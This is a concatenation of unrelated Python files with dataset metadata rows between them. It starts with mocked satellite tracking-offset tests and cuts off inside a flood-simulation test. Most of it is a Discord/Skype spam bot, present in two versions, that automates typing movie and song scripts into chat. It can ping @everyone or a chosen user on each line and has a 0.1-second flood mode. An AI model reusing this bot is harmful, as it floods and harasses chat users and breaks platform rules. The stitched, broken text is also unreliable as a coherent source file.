ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
with mock.patch.object(Connection,
'communicate',
return_value=(False, [1, 2, 3, 4], 4)):
suc = sat.setTrackingOffsets(RA=1, DEC=1, DECcorr=1, Time=1)
self.assertFalse(suc)
def test_setTrackingOffsets_2(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
with mock.patch.object(Connection,
'communicate',
return_value=(True, [1, 2, 3, 4], 1)):
suc = sat.setTrackingOffsets(RA=1, DEC=1, DECcorr=1, Time=1)
self.assertFalse(suc)
def test_setTrackingOffsets_3(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
with mock.patch.object(Connection,
'communicate',
return_value=(True, ['E', 2, 3], 3)):
suc = sat.setTrackingOffsets(RA=1, DEC=1, DECcorr=1, Time=1)
self.assertFalse(suc)
def test_setTrackingOffsets_4(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
with mock.patch.object(Connection,
'communicate',
return_value=(True, ['E', 2, 3, 4], 4)):
suc = sat.setTrackingOffsets(RA=1, DEC=1, DECcorr=1, Time=1)
self.assertFalse(suc)
def test_setTrackingOffsets_5(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
with mock.patch.object(Connection,
'communicate',
return_value=(True, [1, 2, 3, 4], 4)):
suc = sat.setTrackingOffsets(RA=1, DEC=1, DECcorr=1, Time=1)
self.assertTrue(suc)
def test_addTrackingOffsets_1(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
with mock.patch.object(Connection,
'communicate',
return_value=(False, [1, 2, 3, 4], 4)):
suc = sat.addTrackingOffsets(RA=1, DEC=1, DECcorr=1, Time=1)
self.assertFalse(suc)
def test_addTrackingOffsets_2(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
with mock.patch.object(Connection,
'communicate',
return_value=(True, [1, 2, 3, 4], 1)):
suc = sat.addTrackingOffsets(RA=1, DEC=1, DECcorr=1, Time=1)
self.assertFalse(suc)
def test_addTrackingOffsets_3(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
with mock.patch.object(Connection,
'communicate',
return_value=(True, ['E', 2, 3], 3)):
suc = sat.addTrackingOffsets(RA=1, DEC=1, DECcorr=1, Time=1)
self.assertFalse(suc)
def test_addTrackingOffsets_4(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
with mock.patch.object(Connection,
'communicate',
return_value=(True, ['E', 2, 3, 4], 4)):
suc = sat.addTrackingOffsets(RA=1, DEC=1, DECcorr=1, Time=1)
self.assertFalse(suc)
def test_addTrackingOffsets_5(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
with mock.patch.object(Connection,
'communicate',
return_value=(True, [1, 2, 3, 4], 4)):
suc = sat.addTrackingOffsets(RA=1, DEC=1, DECcorr=1, Time=1)
self.assertTrue(suc)
def test_clearTrackingOffsets_1(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
with mock.patch.object(Connection,
'communicate',
return_value=(False, [1, 2, 3, 4], 4)):
suc = sat.clearTrackingOffsets()
self.assertFalse(suc)
def test_clearTrackingOffsets_2(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
with mock.patch.object(Connection,
'communicate',
return_value=(True, [1], 4)):
suc = sat.clearTrackingOffsets()
self.assertFalse(suc)
def test_clearTrackingOffsets_3(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
with mock.patch.object(Connection,
'communicate',
return_value=(True, ['E', 'E'], 2)):
suc = sat.clearTrackingOffsets()
self.assertFalse(suc)
def test_clearTrackingOffsets_4(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
with mock.patch.object(Connection,
'communicate',
return_value=(True, ['E'], 1)):
suc = sat.clearTrackingOffsets()
self.assertFalse(suc)
def test_clearTrackingOffsets_5(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
with mock.patch.object(Connection,
'communicate',
return_value=(True, ['V'], 1)):
suc = sat.clearTrackingOffsets()
self.assertTrue(suc)
| 28.603731
| 86
| 0.524862
| 5,098
| 50,600
| 5.136524
| 0.039427
| 0.033415
| 0.057855
| 0.087069
| 0.936684
| 0.874589
| 0.854502
| 0.847132
| 0.833652
| 0.808676
| 0
| 0.078202
| 0.370237
| 50,600
| 1,768
| 87
| 28.61991
| 0.743551
| 0.006186
| 0
| 0.819465
| 0
| 0
| 0.076619
| 0.021734
| 0
| 0
| 0
| 0
| 0.105498
| 1
| 0.093611
| false
| 0.000743
| 0.004458
| 0
| 0.238484
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6174abac7c9c3ceea0898728d3c1ea4d5ac1804e
| 71
|
py
|
Python
|
tests/errors-test/cases/duplicate-function.py
|
jaydeetay/pxt
|
aad1beaf15edc46e1327806367298cbc942dcbc1
|
[
"MIT"
] | 977
|
2019-05-06T23:12:55.000Z
|
2022-03-29T19:11:44.000Z
|
tests/errors-test/cases/duplicate-function.py
|
jaydeetay/pxt
|
aad1beaf15edc46e1327806367298cbc942dcbc1
|
[
"MIT"
] | 3,980
|
2019-05-09T20:48:14.000Z
|
2022-03-28T20:33:07.000Z
|
tests/errors-test/cases/duplicate-function.py
|
jaydeetay/pxt
|
aad1beaf15edc46e1327806367298cbc942dcbc1
|
[
"MIT"
] | 306
|
2016-04-09T05:28:07.000Z
|
2019-05-02T14:23:29.000Z
|
def helper():
pass
def helper(): # TS9520 duplicate func
pass
| 11.833333
| 37
| 0.633803
| 9
| 71
| 5
| 0.666667
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.076923
| 0.267606
| 71
| 5
| 38
| 14.2
| 0.788462
| 0.295775
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0.5
| 0
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
61beafe8bb0a1a04e7bfaa2eca8000b5e7382f67
| 28,819
|
py
|
Python
|
main.py
|
StanislavParovoy/spam
|
93adebc70c0e38bdceaba7a0d133affd5214bd20
|
[
"MIT"
] | null | null | null |
main.py
|
StanislavParovoy/spam
|
93adebc70c0e38bdceaba7a0d133affd5214bd20
|
[
"MIT"
] | null | null | null |
main.py
|
StanislavParovoy/spam
|
93adebc70c0e38bdceaba7a0d133affd5214bd20
|
[
"MIT"
] | null | null | null |
try:
import pyautogui, time, os, webbrowser
from os import system, name
import sys
print('All required packages have been found!')
time.sleep(1)
except:
try:
os.system('pip install pyautogui')
print('All packages have been installed!')
time.sleep(1)
except:
print('Cannot Install packages!')
exit()
def clear():
if os.name == 'nt':
_ = system('cls')
else:
_ = system('clear')
clear()
screenWidth, screenHeight = pyautogui.size()
#replace all '" in files
print("!I AM NOT RESPONSIBLE FOR ANY BAN'S YOU GET!")
print('Only for discord users!')
print('Activate Annoying mode!')
print('You must have the required @everyone and @here permission to do it!')
print('annoy mode doesn"t work at the moment!')
annoying = input('Y/N ')
if annoying.upper() == 'Y':
print('1. @everyone')
print('2. @here')
print('3. [discord tag]')
who_annoy = int(input('Select option: '))
annoy = ''
if who_annoy == 1:
annoy == '@everyone'
elif who_annoy == 2:
annoy == '@here'
elif who_annoy == 3:
tag = input('Discord Tag: ')
tag1 = '@'+tag
annoy = tag1
while True:
print('')
print('')
print('Spam bot!')
print('')
print('')
time.sleep(1)
print('1. Bee movie Script')
time.sleep(1)
print('2. Shrek scripts')
time.sleep(1)
print('3. Wiki pages!')
time.sleep(1)
print('4. Song Scripts')
time.sleep(1)
print('5. Inputted Text Repeated')
time.sleep(1)
print('6. Change Annoy Target')
time.sleep(1)
print('7. Info')
time.sleep(1)
print('8. Exit/leave mode')#poggers1337
time.sleep(1)
i = int(input('Select option: '))
if i == 1:
print('1. Bee movie Script Selected!')
print(
'...........................................................................................................................')
print('')
print('Leave this running on a Text chat like discord or skype!')
print('You must have the the flashing | otherwise it will put the text in where it has been selected!')
time.sleep(1)
print('')
print('5 seconds before start!')
time.sleep(5)
f = open("Scripts/beemovie.txt", 'r')
for word in f:
pyautogui.press("shift" + "enter")
pyautogui.typewrite(word)
pyautogui.typewrite(' ')
pyautogui.typewrite(annoy)
time.sleep(.1)
pyautogui.press("enter")
print('completed!')
elif i == 2:
print('2. Shrek Scripts Selected!')#poggers1337
print(
'...........................................................................................................................')
print('')
print('1. Shrek 1')
time.sleep(1)
print('2. Shrek 2')
time.sleep(1)
print('3. Shrek 3')
time.sleep(1)
print('4. Shrek 4')
time.sleep(1)
script_choice_shrek = int(input('Select option: '))
if script_choice_shrek == 1:
time.sleep(1)
print('Shrek 1 Selected!')
time.sleep(1)
print('Leave this running on a Text chat like discord or skype!')
print('You must have the the flashing | otherwise it will put the text in where it has been selected!')
time.sleep(1)
print('')
print('5 seconds before start!')
time.sleep(5)
f = open("Scripts/Shrek/shrek_1.txt", 'r')
for word in f:
pyautogui.typewrite(word)
pyautogui.typewrite(' ')
pyautogui.typewrite(annoy)
time.sleep(.1)
pyautogui.press("enter")
print('Completed!')
elif script_choice_shrek == 2:
time.sleep(1)
print('Shrek 2 Selected!')#poggers1337
time.sleep(1)
print('Leave this running on a Text chat like discord or skype!')
print('You must have the the flashing | otherwise it will put the text in where it has been selected!')
time.sleep(1)
print('')
print('5 seconds before start!')
time.sleep(5)
f = open("Scripts/Shrek/shrek_2.txt", 'r')
for word in f:
pyautogui.typewrite(word)
pyautogui.typewrite(' ')
pyautogui.typewrite(annoy)
time.sleep(.1)
pyautogui.press("enter")
print('Completed!')
elif script_choice_shrek == 3:
time.sleep(1)
print('Shrek 3 Selected!')
time.sleep(1)
print('Leave this running on a Text chat like discord or skype!')
print('You must have the the flashing | otherwise it will put the text in where it has been selected!')
time.sleep(1)
print('')
print('5 seconds before start!')
time.sleep(5)
f = open("Scripts/Shrek/shrek_3.txt", 'r')
for word in f:
pyautogui.typewrite(word)
pyautogui.typewrite(' ')
pyautogui.typewrite(annoy)
time.sleep(.1)
pyautogui.press("enter")
print('Completed!')
elif script_choice_shrek == 4:
time.sleep(1)
print('Shrek 4 Selected!')#poggers1337
time.sleep(1)
print('Shrek 4 has no public script, returning!')
else:
print('Invalid Choice!')
elif i == 3:
print('3. Wiki Pages Selected!')
print(
'...........................................................................................................................')
print('')
time.sleep(1)
print("These Wikipedia Scripts are the Base of all of them and more will be added!")
time.sleep(1)
print('DM me if you want to add more. Go to info for contacts!')
print('Or you could make a push on Github!')
time.sleep(2)
print("1. Wikipedia script")
time.sleep(1)
print("2. Cheese")
time.sleep(1)
wiki_selection = int(input('Select Option: '))
if wiki_selection == 1:
print('Cheese Selected!')
time.sleep(1)
print('Leave this running on a Text chat like discord or skype!')
print('You must have the the flashing | otherwise it will put the text in where it has been selected!')
time.sleep(1)
print('')
print('5 seconds before start!')
time.sleep(5)
f = open("Scripts/Wiki/Wikipedia.txt", 'r', encoding="utf8")
for word in f:
pyautogui.press("shift" + "enter")
pyautogui.typewrite(word)
pyautogui.typewrite(' ')
pyautogui.typewrite(annoy)
time.sleep(.1)
pyautogui.press("enter")
print('Completed!')
elif i == 4:#poggers1337
print('4. Song scripts selected!')
print(
'...........................................................................................................................')
print('')
time.sleep(1)
print("These Song Scripts are the Base of all of them and more will be added!")
time.sleep(1)
print('DM me if you want to add more. Go to info for contacts!')
print('Or you could make a push on Github!')
time.sleep(1)
print('1. Rick Roll')
time.sleep(1)
print('2. Dat Boi Sus')
time.sleep(1)
print('3. Wap')
time.sleep(1)
print('4. Black Beatles')
time.sleep(1)
song_selection = int(input('Select option: '))
if song_selection == 1:
print('1. Rick Roll Selected')
time.sleep(1)
print('Starting in 5 seconds')
time.sleep(5)
f = open("Scripts/songs/rick_roll.txt", 'r', encoding="utf8")
for word in f:
pyautogui.press("shift" + "enter")
pyautogui.typewrite(word)
pyautogui.typewrite(' ')
pyautogui.typewrite(annoy)
time.sleep(1)
pyautogui.press("enter")
print('Completed!')
elif song_selection == 2:
print('2. Dat Boi Sus Selected')
time.sleep(1)
print('Starting in 5 seconds')
time.sleep(5)
f = open("Scripts/songs/hatchback.txt", 'r', encoding="utf8")
for word in f:
pyautogui.press("shift" + "enter")
pyautogui.typewrite(word)
pyautogui.typewrite(' ')
pyautogui.typewrite(annoy)
time.sleep(1)
pyautogui.press("enter")
elif song_selection == 3:
print('3. Wap Selected')
time.sleep(1)
print('Starting in 5 seconds')
time.sleep(5)
f = open("Scripts/songs/wap.txt", 'r', encoding="utf8")
for word in f:
pyautogui.press("shift" + "enter")
pyautogui.typewrite(word)
pyautogui.typewrite(' ')#poggers1337
pyautogui.typewrite(annoy)
time.sleep(1)
pyautogui.press("enter")
elif song_selection == 4:
print('4. Black Beatles Selected')
time.sleep(1)
print('Starting in 5 seconds')
time.sleep(5)
f = open("Scripts/songs/blackbeatles.txt", 'r', encoding="utf8")
for word in f:
pyautogui.press("shift" + "enter")
pyautogui.typewrite(word)
pyautogui.typewrite(' ')
pyautogui.typewrite(annoy)
time.sleep(1)
pyautogui.press("enter")
else:
print('Invaild option!')
elif i == 5:
print('5. Inputted Text Repeted Selected!')
print(
'...........................................................................................................................')
print('')
time.sleep(1)
print('Sending messages below 1.5 seconds on discord Can get you banned!')
time.sleep(1)
dangours_mode = input('Would you like to activate dangours mode? Y/N ')
if dangours_mode.upper() == 'Y':
time.sleep(1)
repeat_times = int(input("How many messgaes: "))
if repeat_times <= 1:
print('Invalid answer, It has to be a whole number!')
time.sleep(1)
message = input('Message: ')
time.sleep(5)
for _ in range(repeat_times):
pyautogui.press("shift" + "enter")
pyautogui.typewrite(message)#poggers1337
pyautogui.typewrite(' ')
pyautogui.typewrite(annoy)
time.sleep(0.1)
pyautogui.press("enter")
print('Completed!')
pyautogui.typewrite('Completed!')
wait_before_r = int(input("Time before next Message Sent: "))
if wait_before_r <= 1.5:
print('I AM NOT RESPONSIBLE FOR YOU GETTING BANNED!')
time.sleep(1)
repeat_times = int(input("How many messgaes: "))
if repeat_times <= 1:
print('Invalid answer, It has to be a whole number!')
time.sleep(1)
message = input('Message: ')
time.sleep(5
)
for _ in range(repeat_times):
pyautogui.press("shift" + "enter")
pyautogui.typewrite(message)
pyautogui.typewrite(' ')
pyautogui.typewrite(annoy)
time.sleep(wait_before_r)
pyautogui.press("enter")
print('Completed!')
pyautogui.typewrite('Completed!')
elif i == 6:
print('6. Change Annoy Target Selected!')
print('...........................................................................................................................')
print('')
print('1. @everyone')
print('2. @here')
print('3. [discord tag]')
who_annoy = int(input('Select option: '))
annoy = ''
if who_annoy == 1:
annoy == '@everyone'
elif who_annoy == 2:
annoy == '@here'
elif who_annoy == 3:
tag = input('Discord Tag: ')
tag1 = '@' + tag
annoy = tag1
elif i == 7:
print('6. Info Selected!')
print(
'...........................................................................................................................')
time.sleep(1)
print('Built by sɹǝƃƃod#5183')
time.sleep(1)
print('Copyright 2020 sɹǝƃƃod#5183/poggers1337')#poggers1337
print(
'Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:')
print(
'The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.')
print(
'THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.')
time.sleep(5)
discord_server = input('Would you like to join my discord server for more software? Y/N ')
if discord_server.upper() == 'Y':
webbrowser.open_new(url='https://discord.gg/FuBjvyR')
support = input('Would you like to support me, This is open source and I dont get anything off it! Y/N ')
if support.upper() == 'Y':
webbrowser.open(url='paypal.me/james1collum', new=1)
elif i == 8:
print('1. Change to normal')
time.sleep(1)
print('2. Exit')
exit_change_mode = int(input('Select option: '))
if exit_change_mode == 1:
break
elif exit_change_mode == 2:
print('Exitting')
time.sleep(1)
exit()
else:#poggers1337
print('Invalid answer!')
# ---------------------------------------------------------------------------
# Main spam-bot menu loop.
#
# Rebuilt with helpers and two concrete fixes:
#   * pyautogui.press("shift" + "enter") pressed a single bogus key named
#     "shiftenter"; the intended chat soft-newline is
#     pyautogui.hotkey("shift", "enter").
#   * Script files are opened with `with` so handles are always closed, and
#     non-numeric menu input no longer crashes the whole program.
# ---------------------------------------------------------------------------

_DIVIDER = '.' * 123  # long dotted separator printed between menu screens


def _slow_print(lines, pause=1):
    """Print each line followed by a short pause (the original menu pacing)."""
    for line in lines:
        print(line)
        time.sleep(pause)


def _ask_int(prompt):
    """Read an integer menu choice; return None on non-numeric input."""
    try:
        return int(input(prompt))
    except ValueError:
        print('Invalid answer!')
        return None


def _countdown_to_typing():
    """Tell the user to focus a chat input box, then wait five seconds."""
    print('Leave this running on a Text chat like discord or skype!')
    print('You must have the the flashing | otherwise it will put the text in where it has been selected!')
    time.sleep(1)
    print('')
    print('5 seconds before start!')
    time.sleep(5)


def _type_file(path, delay, encoding=None, soft_newline=True, done_msg=None):
    """Type the contents of *path* line-by-line into the focused window.

    delay        -- seconds to sleep between lines
    encoding     -- passed to open(); None keeps the platform default
    soft_newline -- send Shift+Enter before each line (chat soft newline)
    done_msg     -- optional message printed after the whole file is sent
    """
    with open(path, 'r', encoding=encoding) as script:
        for line in script:
            if soft_newline:
                pyautogui.hotkey("shift", "enter")
            pyautogui.typewrite(line)
            time.sleep(delay)
            pyautogui.press("enter")
    if done_msg:
        print(done_msg)


def _repeat_message(wait_between):
    """Prompt for a message and send it repeatedly, *wait_between* secs apart."""
    repeat_times = _ask_int("How many messgaes: ")
    if repeat_times is None or repeat_times <= 1:
        # The original printed this warning but carried on anyway; abort instead.
        print('Invalid answer, It has to be a whole number!')
        return
    time.sleep(1)
    message = input('Message: ')
    time.sleep(5)
    for _ in range(repeat_times):
        pyautogui.hotkey("shift", "enter")
        pyautogui.typewrite(message)
        time.sleep(wait_between)
        pyautogui.press("enter")
    print('Completed!')
    pyautogui.typewrite('Completed!')


while True:
    clear()
    print('')
    print('')
    print('Spam bot!')
    print('')
    print('')
    time.sleep(1)
    _slow_print([
        '1. Bee movie Script',
        '2. Shrek scripts',
        '3. Wiki pages!',
        '4. Song Scripts',
        '5. Inputted Text Repeated',
        '6. Info',
        '7. Exit',
    ])
    choice = _ask_int('Select option: ')

    if choice == 1:
        print('1. Bee movie Script Selected!')
        print(_DIVIDER)
        print('')
        _countdown_to_typing()
        _type_file("Scripts/beemovie.txt", 0.1, done_msg='completed!')

    elif choice == 2:
        print('2. Shrek Scripts Selected!')
        print(_DIVIDER)
        print('')
        _slow_print(['1. Shrek 1', '2. Shrek 2', '3. Shrek 3', '4. Shrek 4'])
        pick = _ask_int('Select option: ')
        if pick in (1, 2, 3):
            time.sleep(1)
            print('Shrek %d Selected!' % pick)
            time.sleep(1)
            _countdown_to_typing()
            # NOTE: Shrek scripts were typed WITHOUT the Shift+Enter soft
            # newline in the original; keep that behaviour.
            _type_file("Scripts/Shrek/shrek_%d.txt" % pick, 0.1,
                       soft_newline=False, done_msg='Completed!')
        elif pick == 4:
            time.sleep(1)
            print('Shrek 4 Selected!')
            time.sleep(1)
            print('Shrek 4 has no public script, returning!')
        else:
            print('Invalid Choice!')

    elif choice == 3:
        print('3. Wiki Pages Selected!')
        print(_DIVIDER)
        print('')
        time.sleep(1)
        print("These Wikipedia Scripts are the Base of all of them and more will be added!")
        time.sleep(1)
        print('DM me if you want to add more. Go to info for contacts!')
        print('Or you could make a push on Github!')
        time.sleep(2)
        _slow_print(["1. Wikipedia script", "2. Cheese"])
        pick = _ask_int('Select Option: ')
        wiki_scripts = {
            1: ('Wikipedia Selected!', "Scripts/Wiki/Wikipedia.txt"),
            2: ('Cheese Selected!', "Scripts/Wiki/cheese.txt"),
        }
        if pick in wiki_scripts:
            label, path = wiki_scripts[pick]
            print(label)
            time.sleep(1)
            _countdown_to_typing()
            _type_file(path, 1, encoding="utf8", done_msg='Completed!')

    elif choice == 4:
        print('4. Song scripts selected!')
        print(_DIVIDER)
        print('')
        time.sleep(1)
        print("These Song Scripts are the Base of all of them and more will be added!")
        time.sleep(1)
        print('DM me if you want to add more. Go to info for contacts!')
        print('Or you could make a push on Github!')
        time.sleep(1)
        _slow_print(['1. Rick Roll', '2. Dat Boi Sus', '3. Wap', '4. Black Beatles'])
        pick = _ask_int('Select option: ')
        songs = {
            1: ('1. Rick Roll Selected', "Scripts/songs/rick_roll.txt"),
            2: ('2. Dat Boi Sus Selected', "Scripts/songs/hatchback.txt"),
            3: ('3. Wap Selected', "Scripts/songs/wap.txt"),
            4: ('4. Black Beatles Selected', "Scripts/songs/blackbeatles.txt"),
        }
        if pick in songs:
            label, path = songs[pick]
            print(label)
            time.sleep(1)
            print('Starting in 5 seconds')
            time.sleep(5)
            _type_file(path, 1, encoding="utf8", done_msg='Completed!')
        else:
            print('Invaild option!')

    elif choice == 5:
        print('5. Inputted Text Repeted Selected!')
        print(_DIVIDER)
        print('')
        time.sleep(1)
        print('Sending messages below 1.5 seconds on discord Can get you banned!')
        time.sleep(1)
        dangours_mode = input('Would you like to activate dangours mode? Y/N ')
        if dangours_mode.upper() == 'Y':
            # "Dangerous" mode: fixed 0.1 s between messages.
            time.sleep(1)
            _repeat_message(0.1)
        else:
            wait_before_r = _ask_int("Time before next Message Sent: ")
            if wait_before_r is not None:
                if wait_before_r <= 1.5:
                    print('I AM NOT RESPONSIBLE FOR YOU GETTING BANNED!')
                time.sleep(1)
                _repeat_message(wait_before_r)

    elif choice == 6:
        print('6. Info Selected!')
        print(_DIVIDER)
        time.sleep(1)
        print('Built by sɹǝƃƃod#5183')
        time.sleep(1)
        print('Copyright 2020 sɹǝƃƃod#5183/poggers1337')
        print('Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:')
        print('The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.')
        print('THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.')
        time.sleep(5)
        if input('Would you like to join my discord server for more software? Y/N ').upper() == 'Y':
            webbrowser.open_new('https://discord.gg/FuBjvyR')
        if input('Would you like to support me, This is open source and I dont get anything off it! Y/N ').upper() == 'Y':
            webbrowser.open('paypal.me/james1collum')

    elif choice == 7:
        print('End')
        break

exit()
#poggers1337
| 42.194729
| 479
| 0.488775
| 3,116
| 28,819
| 4.48941
| 0.094673
| 0.099721
| 0.088641
| 0.085782
| 0.937665
| 0.922796
| 0.916291
| 0.908857
| 0.906998
| 0.903496
| 0
| 0.025205
| 0.352962
| 28,819
| 683
| 480
| 42.194729
| 0.724996
| 0.010722
| 0
| 0.928025
| 0
| 0.012251
| 0.371331
| 0.074638
| 0
| 0
| 0
| 0
| 0
| 1
| 0.001531
| false
| 0
| 0.004594
| 0
| 0.006126
| 0.344564
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
61c36917720aaef146bc0e59bd823333cd046fd1
| 173
|
py
|
Python
|
keep_alive.py
|
krkunal/CarND-Behavioral-Cloning-P3
|
dba13041b83629f36832efdca8be6949d26642f6
|
[
"MIT"
] | null | null | null |
keep_alive.py
|
krkunal/CarND-Behavioral-Cloning-P3
|
dba13041b83629f36832efdca8be6949d26642f6
|
[
"MIT"
] | null | null | null |
keep_alive.py
|
krkunal/CarND-Behavioral-Cloning-P3
|
dba13041b83629f36832efdca8be6949d26642f6
|
[
"MIT"
] | null | null | null |
#! /bin/python3
"""Keep-alive launcher: run the simulator binary and block until it exits."""
import os
import subprocess

# Long-running work: launch the simulator and wait for it to finish.
# subprocess.run with an argument list avoids shell interpretation
# (the original os.system call went through a shell and ignored the status).
try:
    subprocess.run(
        ["term1-simulator-linux/beta_simulator_linux/beta_simulator.x86_64"],
        check=False,  # best-effort, mirroring the original os.system behaviour
    )
except FileNotFoundError:
    # os.system merely printed a shell error here; stay best-effort.
    print("simulator binary not found")
print("hello")
| 21.625
| 77
| 0.763006
| 25
| 173
| 5.12
| 0.76
| 0.21875
| 0.28125
| 0.421875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.039474
| 0.121387
| 173
| 8
| 78
| 21.625
| 0.802632
| 0.231214
| 0
| 0
| 0
| 0
| 0.539063
| 0.5
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0.25
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 8
|
4ee272e07a11b7fc4c9fe816675e0dae21a424d2
| 2,293
|
py
|
Python
|
tests/test_conservation_mass_2d.py
|
firedrakeproject/flooddrake
|
4a78c426a7171a27d02f864ee8e9d7b324163116
|
[
"MIT"
] | 6
|
2018-07-27T04:09:53.000Z
|
2022-03-07T21:19:43.000Z
|
tests/test_conservation_mass_2d.py
|
firedrakeproject/flooddrake
|
4a78c426a7171a27d02f864ee8e9d7b324163116
|
[
"MIT"
] | 19
|
2016-06-14T09:13:01.000Z
|
2021-05-20T08:40:55.000Z
|
tests/test_conservation_mass_2d.py
|
firedrakeproject/flooddrake
|
4a78c426a7171a27d02f864ee8e9d7b324163116
|
[
"MIT"
] | 4
|
2016-06-09T10:09:28.000Z
|
2022-03-07T21:19:43.000Z
|
""" test conservation of mass in 2d dam break problem """
from __future__ import division
import numpy as np
from firedrake import *
from flooddrake import *
def test_conservation_mass_2d_flat_source():
    """Water mass should be conserved for a short run over a flat bed."""
    n = 5
    mesh = UnitSquareMesh(n, n)

    # Mixed DG1 function space: water depth plus x/y momentum components.
    v_h = FunctionSpace(mesh, "DG", 1)
    v_mu = FunctionSpace(mesh, "DG", 1)
    v_mv = FunctionSpace(mesh, "DG", 1)
    V = v_h * v_mu * v_mv

    # Constant free-surface depth of 0.8 over a flat (zero) bed.
    g = Function(V)
    g.sub(0).assign(0.8)
    bed = Function(V)
    state = State(V, g, bed)

    # No source term; snapshot the initial state before stepping.
    source = Function(v_h)
    w_start = Function(V).assign(state.w)

    # Advance the solution for a short interval.
    t_end = 0.01
    solution = Timestepper(V, state.bed, source, 0.025)
    w_end = solution.stepper(0, t_end, state.w, 0.025)

    # Project the depth component out of the mixed state at both times.
    h_start, mu_start, mv_start = split(w_start)
    h_end, mu_end, mv_end = split(w_end)
    depth_start = Function(v_h).project(h_start)
    depth_end = Function(v_h).project(h_end)

    # Total water volume before and after should agree to a tight tolerance.
    mass_diff = np.abs(assemble(depth_start * dx) - assemble(depth_end * dx))
    assert mass_diff <= 1e-4
def test_conservation_mass_2d_unflat_source():
    """Water mass should be conserved when the free surface has a raised disc."""
    n = 5
    mesh = UnitSquareMesh(n, n)

